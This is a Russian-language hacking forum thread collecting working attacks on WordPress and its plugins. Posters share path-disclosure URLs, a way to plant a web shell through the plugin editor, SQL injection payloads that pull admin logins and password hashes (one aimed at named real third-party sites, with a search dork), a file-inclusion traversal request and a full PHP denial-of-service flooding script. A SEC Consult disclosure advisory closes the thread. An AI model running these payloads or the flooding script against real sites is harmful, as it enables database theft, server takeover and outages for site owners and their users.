[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. karencho777

    karencho777 New Member

    Joined:
    20 Jan 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    подскажите как узнать версию wordpress
     
  2. total90

    total90 Elder - Старейшина

    Joined:
    30 Sep 2009
    Messages:
    90
    Likes Received:
    85
    Reputations:
    12

    В исходнике страницы.
    <meta name="generator" content="WordPress x.x" />
     
  3. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Что значит обрабатывает php.jpg как php?
    Впервые такое слышу.

    Он будет обрабатывать его как картинку, так что чтобы выполнить код скрипта придется искать, скажем, инклуд :)
     
    1 person likes this.
  4. Refqs

    Refqs Banned

    Joined:
    20 Feb 2010
    Messages:
    139
    Likes Received:
    56
    Reputations:
    27
    для wp 3.0.1 есть уязвимости?
     
  5. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452

    http://blog.ru/wp-admin/post-new.php

    Уязвимое поле: "Заголовок"
    Тип уязвимости: Актив XSS
    Публикация приводит к XSS на главной.

    Нашел вчера, у себя в блоге тестил.
     
    _________________________
    3 people like this.
  6. RA1Sh

    RA1Sh New Member

    Joined:
    29 Nov 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Как её прикрыть ? ))
     
  7. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    #147 Дирижабль, 17 Aug 2010
    Last edited: 17 Aug 2010
  8. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    WordPress 3.0.1
    поковырялся немного и нашел пути

    Раскрытие пути:
    Code:
    http://localhost/wordpress/wp-admin/edit.php?post_type[]=page
    http://localhost/wordpress/wp-admin/options-general.php?page[]=
    http://localhost/wordpress/wp-admin/post-new.php?post_type[]=page
    http://localhost/wordpress/wp-admin/plugins.php?activate=true&plugin_status=all&paged[]=1
    http://localhost/wordpress/wp-admin/plugin-editor.php?file[]=
    Заливаем шелл через админку:
    все удаляем и пишем исходный код шелла..
    по адресу site/wordpress/wp-content/plugins/ будет наш шелл.
     
    #148 Дирижабль, 19 Aug 2010
    Last edited: 19 Aug 2010
    7 people like this.
  9. Refqs

    Refqs Banned

    Joined:
    20 Feb 2010
    Messages:
    139
    Likes Received:
    56
    Reputations:
    27
    Ок, вот тоже парочку раскрытей наковырял:
     
  10. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    в тройке практически во всех php файлах присутствует ошибка обработки get_header();, что ведет к раскрытию путей, я у себя просто запретил вывод ошибок, добавив error_reporting (0);.

    Если можно по другому решить это, буду рад услышать :) .
     
    _________________________
    1 person likes this.
  11. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    73
    Reputations:
    -8
    Кто может рассказать про уязвимость с выдеранием фтп в WP версиях 2.8.6-3.0.0? Или выдеранием админских данных?
     
  12. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    WordPress 2.9.2

    Code:
    http://127.0.0.1/wordpress/wp-admin/includes/misc.php
    http://127.0.0.1/wordpress/wp-admin/import/rss.php
    http://127.0.0.1/wordpress/wp-admin/includes/admin.php
    http://127.0.0.1/wordpress/wp-admin/includes/file.php
    http://127.0.0.1/wordpress/wp-admin/includes/comment.php
    http://127.0.0.1/wordpress/wp-admin/includes/user.php
    http://127.0.0.1/wordpress/wp-admin/includes/update.php
    
    + по умалчанию можно смотреть содержимое http://127.0.0.1/wordpress/wp-admin/includes/ в котором много файлов с раскрытием путей.

    Ссори, если баян.
     
    _________________________
    #152 <Cyber-punk>, 27 Sep 2010
    Last edited: 27 Sep 2010
  13. krobol

    krobol Elder - Старейшина

    Joined:
    10 Feb 2008
    Messages:
    54
    Likes Received:
    7
    Reputations:
    0
    SQL-inj WordPress до версии 3.0.1 (нужны права Author)

    Description: SQL injection vulnerability in do_trackbacks() function of WordPress allows remote attackers to execute arbitrary SELECT SQL query.
    Access Vector: Network
    Attack Complexity: Medium
    Authentication: Single Instance
    Confidentiality Impact: Partial
    Integrity Impact: None
    Availability Impact: None

    Code:
    UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this 
    article. 
      
    The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that 
    comes from the user, allowing a remote user with publish_posts and edit_published_posts 
    capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any 
    information stored in the WordPress database. 
      
    function do_trackbacks($post_id) { 
        global $wpdb; 
       
        $post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) ); 
        $to_ping = get_to_ping($post_id); 
        $pinged  = get_pung($post_id); 
        if ( empty($to_ping) ) { 
            $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) ); 
            return; 
        } 
       
        if ( empty($post->post_excerpt) ) 
            $excerpt = apply_filters('the_content', $post->post_content); 
        else 
            $excerpt = apply_filters('the_excerpt', $post->post_excerpt); 
        $excerpt = str_replace(']]>', ']]>', $excerpt); 
        $excerpt = wp_html_excerpt($excerpt, 252) . '...'; 
       
        $post_title = apply_filters('the_title', $post->post_title); 
        $post_title = strip_tags($post_title); 
       
        if ( $to_ping ) { 
            foreach ( (array) $to_ping as $tb_ping ) { 
                $tb_ping = trim($tb_ping); 
                if ( !in_array($tb_ping, $pinged) ) { 
                    trackback($tb_ping, $post_title, $excerpt, $post_id); 
                    $pinged[] = $tb_ping; 
                } else { 
                    $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) ); 
                } 
            } 
        } 
    } 
      
    The $tb_ping variable is passed to the query in line 1657 unescaped. 
      
    Exploitation. The logged in user must have publish_posts and edit_published_posts capabilities 
    (this corresponds to the Author role). 
      
    First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is: 
      
    AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’ 
      
    and publishes it. He needs to wait a bit — for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed: 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    Then the user goes back and edits the post. 
      
    Now the user duplicates the text in the “Send Trackbacks” field and updates the post: 
      
    AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’ 
      
    AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’ 
      
    The get_to_ping() function says that these trackbacks are to be processed: 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,' 
      
    Query logging shows that WordPress executes this query (reformatted for the sake of readbility): 
      
    UPDATE wp_posts 
    SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'', '')) 
    WHERE ID = 11 
      
    After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), the admin information is shown in the input box. 
      
    Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed. 
    The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch. 
      
    Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed. 
    The examples above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.
    Только что проверил на денвере. На 3.0.1 работает, на 3.0.2 нет.
     
    #153 krobol, 12 Dec 2010
    Last edited: 12 Dec 2010
  14. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    FBConnect SQL-InJ

    Доброго времени суток, ковырял тут водпресс и вот что наковырял)

    Тип: SQL-Inj

    Плагин: Хрен его знает как он называется точно, так как пасс не подобрал) но какой-то фейсбуковский)

    Dork: inurl:"fbconnect_action=myhome"

    Собственно PoC:

    http://www.sociable.es/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
    или
    http://binaries.ru/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

    P.S. Вроде не боян, хотя с вордпрессом не работаю, поэтому не в курсе)

    P.P.S В Google
    Развлекайтесь)))
     
    12 people like this.
  15. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
  16. White Bear

    White Bear New Member

    Joined:
    3 Apr 2011
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    LFI

    Vulnerable Plugin: WordPress WP Custom Pages 0.5.0.1


    Type vulnerable: LFI


    Description: Уязвимость позволяет удаленному пользователю получить доступ с помощью специально сформированного запроса к произвольным файлам на сервере.

    -=POC=-
    Code:
    http://localhost/wordpress/wp-content/plugins/wp-custom-pages/wp-
    download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
    Author: AutoSec Tools
     
    #156 White Bear, 5 Apr 2011
    Last edited: 5 Apr 2011
    2 people like this.
  17. ^_WhitE_DeMoN_^

    Joined:
    1 Mar 2009
    Messages:
    101
    Likes Received:
    10
    Reputations:
    0
    Wordpress 3.0.1 - Remote Denial Of Service Exploit

    PHP:
    <?php

    // Curl php5 ;)

    function info()
    {
        echo 
    "##################################################################\n";
        echo 
    "# Wordpress 3.0.1 - Remote Denial Of Service Exploit\n";
        echo 
    "# Author: KnocKout\n";
        echo 
    "# Greatz : DaiMon,BARCOD3\n";
        echo 
    "##################################################################\n";
        echo 
    "# php poc.php target\n";
        echo 
    "# php poc.php http://www.victim.com/PATH/ 20 5\n";
        echo 
    "________________________________________\n";
        exit;
    }

    if(
    $argc !== || !preg_match('#^\d+$#'$argv[2]) || !preg_match('#^\d+$#'$argv[3]))
    {
        
    info();
    }

    $url $argv[1];
    $threads = (int) $argv[2];
    $timeout = (int) $argv[3];

    $ptimeout $timeout 100;

    $packet implode('+'range(100,999));

    while(
    1)
    {
        
    $m curl_multi_init();

        for(
    $i 0$i $threads$i++)
        {
            
    $c[$i] = curl_init();
            
    $opts = array
            (
                
    CURLOPT_URL        => $url 'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0',
                
    CURLOPT_USERAGENT    => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52',
                
    CURLOPT_ENCODING    => 'gzip, deflate',
                
    CURLOPT_POST        => 1,
                
    CURLOPT_POSTFIELDS    => 'search_keywords='$packet .'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000',
                
    CURLOPT_RETURNTRANSFER    => 1,
                
    CURLOPT_TIMEOUT        => $timeout,
            );
            
    curl_setopt_array($c[$i], $opts);
            
    curl_multi_add_handle($m$c[$i]);
        }

        
    $t 0;
        do
        {
            
    curl_multi_exec($m$r);
            
    usleep(100000);

            
    $t++;

            if(
    $t $ptimeout)
            {
                
    curl_multi_close($m);
                for(
    $i 0$i $threads$i++)
                {
                    
    curl_close($c[$i]);
                }
                break;
            }
        }
        while(
    $r 0);

        echo 
    '.';
    }
    ?>
     
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Было время, нашёл уязвимость под нужный двиг:
    SQL-иньекция:URL:/wp-content/plugins/wpforum/sendmail.php
    Версия: WordPress 2.7.1
    Уязвимый параметр: GET-id
    Эксплоит: /wp-content/plugins/wpforum/sendmail.php?action=quote&id=1+union+select+1,2,3+--+
     
    #158 randman, 30 Apr 2011
    Last edited: 9 May 2011
  19. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    2SergioBlog возможно, Flash XSS.
    _http://www.securitylab.ru/analytics/216391.php
    _http://www.inattack.ru/article/572.html
    + моя заметка _http://ramb.datapunk.ru/index.php/2011/04/flash-xss-persistent/
     
  20. абвгдешка

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    WordPress 3.1.3 SQL Injection Vulnerabilities

    Code:
    SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
    =======================================================================
                  title: Multiple SQL Injection Vulnerabilities
                product: WordPress
     vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
          fixed version: 3.1.4/3.2-RC3
                 impact: Medium
               homepage: http://wordpress.org/
                  found: 2011-06-21
                     by: K. Gudinavicius                            
                         SEC Consult Vulnerability Lab
                         https://www.sec-consult.com
    =======================================================================
     
    Vendor description:
    -------------------
    "WordPress was born out of a desire for an elegant, well-architectured
    personal publishing system built on PHP and MySQL and licensed under
    the GPLv2 (or later). It is the official successor of b2/cafelog.
    WordPress is fresh software, but its roots and development go back to
    2001."
     
    Source: http://wordpress.org/about/
     
     
     
    Vulnerability overview/description:
    -----------------------------------
    Due to insufficient input validation in certain functions of WordPress
    it is possible for a user with the "Editor" role to inject arbitrary
    SQL commands. By exploiting this vulnerability, an attacker gains
    access to all records stored in the database with the privileges of the
    WordPress database user.
     
     
     
    Proof of concept:
    -----------------
    1) The get_terms() filter declared in the wp-includes/taxonomy.php file
    does not properly validate user input,  allowing an attacker with
    "Editor" privileges to inject arbitrary SQL commands in the "orderby"
    and "order" parameters passed as array members to the vulnerable filter
    when sorting for example link categories.
     
    The following URLs could be used to perform blind SQL injection
    attacks:
     
    http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
    injection]&order=[SQL injection]
    http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
    injection]&order=[SQL injection]
    http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
    injection]&order=[SQL injection]
     
     
    2) The get_bookmarks() function declared in the
    wp-includes/bookmark.php file does not properly validate user input,
    allowing an attacker with "Editor" privileges to inject arbitrary SQL
    commands in the "orderby" and "order" parameters passed as array
    members to the vulnerable function when sorting links.
     
    The following URL could be used to perform blind SQL injection attacks:
     
    http://localhost/wp-admin/link-manager.php?orderby=[SQL
    injection]&order=[SQL injection]
     
     
    Vulnerable / tested versions:
    -----------------------------
    The vulnerability has been verified to exist in version 3.1.3 of
    WordPress, which is the most recent version at the time of discovery.
     
     
    Vendor contact timeline:
    ------------------------
    2011-06-22: Contacting vendor through security () wordpress org
    2011-06-22: Vendor reply, sending advisory draft
    2011-06-23: Vendor confirms security issue
    2011-06-30: Vendor releases patched version
    2011-07-01: SEC Consult publishes advisory
     
     
     
    Solution:
    ---------
    Upgrade to version 3.1.4 or 3.2-RC3
     
     
    Workaround:
    -----------
    A more restrictive role, e.g. "Author", could be applied to the user.
     
     
     
    Advisory URL:
    -------------
    https://www.sec-consult.com/en/advisories.html
     
     
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    SEC Consult Unternehmensberatung GmbH
     
    Office Vienna
    Mooslackengasse 17
    A-1190 Vienna
    Austria
     
    Tel.: +43 / 1 / 890 30 43 - 0
    Fax.: +43 / 1 / 890 30 43 - 25
    Mail: research at sec-consult dot com
    https://www.sec-consult.com
     
    EOF K. Gudinavicius / @2011